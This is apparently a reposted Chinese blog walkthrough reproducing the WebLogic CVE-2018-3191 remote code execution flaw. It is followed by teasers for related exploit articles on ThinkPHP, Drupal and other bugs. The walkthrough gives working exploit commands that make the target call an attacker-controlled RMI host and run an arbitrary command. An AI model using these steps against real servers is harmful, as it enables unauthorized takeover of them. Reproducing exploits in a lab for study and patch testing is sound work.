CVE-2018-3191遠端程式碼命令執行漏洞

阿新 • • 發佈：2018-11-25

0x00 weblogic漏洞簡介

北京時間10月17日，Oracle官方釋出的10月關鍵補丁更新CPU（Critical Patch Update）中修復了一個高危的WebLogic遠端程式碼執行漏洞（CVE-2018-3191）。該漏洞允許未經身份驗證的攻擊者通過T3協議網路訪問並破壞易受攻擊的WebLogic Server，成功的漏洞利用可導致WebLogic Server被攻擊者接管，從而造成遠端程式碼執行。這個漏洞由Matthias Kaiser，loopx9，Li Zhengdong申報。

0x01復現準備

首先準備payload

java -jar weblogic-spring-jndi.jar rmi://攻擊端ip:埠/Exp > payload.txt

然後搭建rmi伺服器端

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 埠 CommonsCollections1 "要執行的指令"

0x02 復現

Python weblogic.py target_ip target_port payload.txt

此時rmi伺服器那邊能看到有連線

0x03 驗證結果

此時可以看到1.txt寫入了

CVE-2018-3191遠端程式碼命令執行漏洞

0x00 weblogic漏洞簡介北京時間10月17日，Oracle官方釋出的10月關鍵補丁更新CPU（Critical Patch Update）中修復了一個高危的WebLogic遠端程式碼執行漏洞（CVE-2018-3191）。該漏洞允許未經身份驗證的攻擊者通過T3協議網路訪問並破壞易受攻

Drupal 遠端命令執行漏洞（CVE-2018-7600）

名稱： Drupal 遠端命令執行漏洞 CVE-ID: CVE-2018-7600 Poc: https://paper.seebug.org/578/ EXPLOIT-DB： https://www.exploit-db.com/exploits/44448/ 平臺： PHP 漏洞描述：

CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現

## 一、漏洞描述 Spring Data是一個用於簡化資料庫訪問，並支援雲服務的開源框架，Spring Data Commons是Spring Data下所有子專案共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中，存在一處SpEL表示式注入漏洞，攻擊者可以注入惡意

GoAhead Web伺服器遠端命令執行漏洞（CVE-2017-17562）漏洞復現

一、漏洞概述： 1、漏洞簡介： GoAhead Web Server，它是一個開源（商業許可）、簡單、輕巧、功能強大、可以在多個平臺執行的嵌入式Web Server。 GoAhead Web Server是跨平臺的伺服器軟體，可以穩定地執行在Windows，Linux和

驗證php的遠端命令執行漏洞案例

比如驗證JBoss EJBInvokerServlet Marshalled Object RCE（CVE-2013-4810 ） 0x01:首先我們開啟php的環境，如phpStudy，wamp等等，這裡我們就使用phpStudy吧，進入php-5.5.38的目錄(當前使用的這個php版本

php程式碼審計命令執行漏洞

命令執行漏洞，使用者通過瀏覽器在遠端伺服器上執行任意系統命令，嚴格意義上，與程式碼執行漏洞還是有一定的區別。常用命令執行函式 exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠端命令執行漏洞利用（GetShell）(轉載)

ThinkPHP官方2018年12月9日釋出重要的安全更新，修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新，由於框架對控制器名沒有進行足夠的檢測會導致在沒有開啟強制路由的情況下可能的getshell漏洞，受影響的版本包括5.0和5.1版本，推薦儘快更新到最新版本。漏洞分析 Thin

富士施樂 DocuCentre-V 3065 印表機遠端命令執行漏洞

直接上程式碼： Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution Date: 2018-09-05 Exploit Author: vr_system

漏洞預警 | ThinkPHP 5.x遠端命令執行漏洞

ThinkPHP採用面向物件的開發結構和MVC模式，融合了Struts的思想和TagLib（標籤庫）、RoR的ORM對映和ActiveRecord模式，是一款相容性高、部署簡單的輕量級國產PHP開發框架。近日，ThinkPHP團隊釋出了版本更新資訊，修復一個遠端程式碼執行漏洞。該漏洞是由於框架對控制器名沒

ThinkPHP 5.x 遠端命令執行漏洞復現（GetShell）

注：轉載請註明出自：https://blog.csdn.net/qq_36711453/article/details/84977739 一、簡介 ThinkPHP官方2018年12月9日釋出重要的安全更新，修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新，由於框架對控制器名沒

ThinkPHP 遠端命令執行漏洞復現(GetShell)

漏洞概況 ThinkPHP是一款國內流行的開源PHP框架，近日被爆出存在可能的遠端程式碼執行漏洞，攻擊者可向快取檔案內寫入PHP程式碼，導致遠端程式碼執行。雖然該漏洞利用需要有幾個前提條件，但鑑於國內使用ThinkPHP框架的站點數量之多，該漏洞還是存在一定的影響範圍。由於框架對控制器名沒有

Windows系統SMB RDP遠端命令執行漏洞風險預警

一、風險預警最近多個雲端計算供應商收到安全協助請求，經調查，都是因為未及時升級Windows系統SMB/RDP遠端命令執行漏洞補丁同時135/137/139/445埠開放到網際網路，進而導致主機被入侵，對業務造成影響。微軟已釋出補丁，但大量租戶還未打補丁，存在很大安全風險，我們強烈建議收到預警通

drupal7 cve-2018-7600任意程式碼執行利用

Author: [email protected] 對於cve-2018-7600的利用，比較出名的應該是Drupalgeddon2，其中對7的利用是使用了passthru函式執行命令，但是有一個問題便是，你會發現除了能執行命令，好像做不了其他的。下面將剖析這個問題，另外如果disable_func

ThinkPHP遠端命令執行漏洞原理及復現

2018年12月11日，exploit-db更新了一個thinkphp框架遠端程式碼執行漏洞exploit地址：https://www.exploit-db.com/exploits/45978由於框架對控制器名沒有進行足夠的檢測導致在沒有開啟強制路由的情況下getshell漏洞影響範圍Thinkphp 5.

weblogic之CVE-2018-3191漏洞分析

weblogic之CVE-2018-3191漏洞分析理解這個漏洞首先需要看這篇文章：https://www.cnblogs.com/afanti/p/10193169.html 引用廖新喜說的，說白的就是反序列化時lookup中的引數可控，導致 JNDI注入 AbstractPlatformTra

[工具]Tomcat CVE-2017-12615 遠端程式碼執行

工具: K8_TocmatExp編譯: VS2012 C# (.NET Framework v2.0)組織: K8搞基大隊[K8team]作者: K8拉登哥哥部落格: http://qqhack8.blog.

PHPMailer 命令執行漏洞（CVE-2016-10033）分析

PHPMailer是一個基於PHP語言的郵件傳送元件，被廣泛運用於諸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等使用者量巨大的應用與框架中。 CVE-2016-10033是PHPMailer中存在的高危安全漏洞，攻擊者只

Maccms8.x 命令執行漏洞分析

mon 鏈接文件 https 提交 index.php method if條件 xpl 下載鏈接https://share.weiyun.com/23802397ed25681ad45c112bf34cc6db 首先打開Index.php $m = be(‘ge

web命令執行漏洞

命令執行漏洞一，什麽是命令執行漏洞：應用有時需要調用一些執行系統命令的函數，如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等，當用戶能控制這些函數中的參數時，就可以將惡意系統命令拼接到正常命令中，從而造成命令執行攻擊，這就是命令執行漏洞。二，利

命令執行漏洞

linux -c log escape 二進制文件內網滲透 open 網站 style 命令執行應用有時需要調用一些執行系統命令的函數，如PHP中的system、exec、shell_exec、 passthru、popen、proc_popen等，當用戶能控制這